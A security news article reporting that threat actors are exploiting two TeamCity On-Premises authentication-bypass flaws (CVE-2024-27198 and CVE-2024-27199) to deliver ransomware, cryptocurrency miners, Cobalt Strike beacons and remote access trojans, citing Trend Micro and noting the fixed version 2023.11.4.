Multiple threat actors are exploiting two recently patched vulnerabilities affecting JetBrains’ TeamCity On-Premises continuous integration and continuous delivery (CI/CD) server to deliver ransomware, cryptocurrency miners, and other malware.
Tracked as CVE-2024-27198 and CVE-2024-27199, the flaws are described as an improper authentication issue, which could lead to the system takeover. The flaws may allow an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server. The flaws impact all TeamCity On-Premises versions through 2023.11.3. The issues have been fixed in version 2023.11.4.
“Public proof-of-concept (POCs) exploits for these vulnerabilities already exist, heightening the risk of widespread exploitation,” cybersecurity firm Trend Micro notes in its recent report.
Threat actors may exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication measures on vulnerable On-Premise TeamCity servers and execute commands. This could lead to Remote Code Execution (RCE) and enable malicious activities related to TeamCity processes, such as initiating command and scripting interpreters like PowerShell to download further malware or execute reconnaissance commands.
Subsequently, attackers can install malware capable of establishing communication with its command-and-control (C&C) server, enabling the execution of additional commands such as deploying Cobalt Strike beacons and Remote Access Trojans (RATs). Finally, ransomware may be deployed as the ultimate payload, encrypting files and extorting ransom payments from victims.
The researchers said they observed multiple attacks exploiting these flaws. In one case, attackers abused the flaws to drop the Jasmin ransomware. In other instances, the threat actors were observed deploying a variant of the XMRig cryptocurrency miner, Cobalt Strike beacons, the SparkRat malware, and executing domain discovery and persistence commands.